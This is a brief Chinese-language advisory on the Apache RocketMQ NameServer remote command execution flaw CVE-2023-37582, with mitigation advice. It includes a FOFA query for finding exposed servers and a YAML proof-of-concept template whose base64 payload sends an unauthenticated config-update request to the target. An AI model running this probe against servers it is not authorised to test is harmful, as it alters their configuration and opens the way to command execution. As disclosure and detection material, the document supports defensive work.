Apache RocketMQ远程命令执行漏洞【CVE-2023-37582】

一、漏洞描述

7.12日Apache RocketMQ发布严重安全提醒，披露远程命令执行漏洞（CVE-2023-37582）
Apache RocketMQ是一款开源的分布式消息和流处理平台，提供高效、可靠、可扩展的低延迟消息和流数据处理能力，广泛用于异步通信、应用解耦、系统集等场景。加密货币行业有大量平台采用此产品用来处理消息服务，注意风险。

二、漏洞分析

当RocketMQ的NameServer组件暴露在外网时，并且缺乏有效的身份认证机制时，攻击者可以利用更新配置功能，以RocketMQ运行的系统用户身份执行命令。

三、影响版本

FOFA语句：port=9876 && protocol=“rocketmq”

四、漏洞复现

POC

set:
  hostname: request.url.host
  host: request.url.domain
  data: base64Decode("AAAA0AAAALJ7ImNvZGUiOjMxOCwiZXh0RmllbGRzIjp7IkFjY2Vzc0tleSI6InJvY2tldG1xMiIsIlNpZ25hdHVyZSI6ImNHSmpxMUZCTSs0VUJsUnNORE50azBVOW5EMD0ifSwiZmxhZyI6MCwibGFuZ3VhZ2UiOiJKQVZBIiwib3BhcXVlIjowLCJzZXJpYWxpemVUeXBlQ3VycmVudFJQQyI6IkpTT04iLCJ2ZXJzaW9uIjo0MzV9dGhpc19pc19rZXk9dGhpc19pc192YWx1ZQo=")
rules:
  r0:
    request:
      type: tcp
      host: "{{hostname}}"
      data: "{{data}}"
    expression: response.raw.bcontains(b'"code":0') && response.raw.bcontains(b'serializeTypeCurrentRPC')
expression: r0()

直接使用x-poc检测

小龙POC检测

五、修复建议

升级到最新版本
开启Broker、NameServer等组件的身份认证机制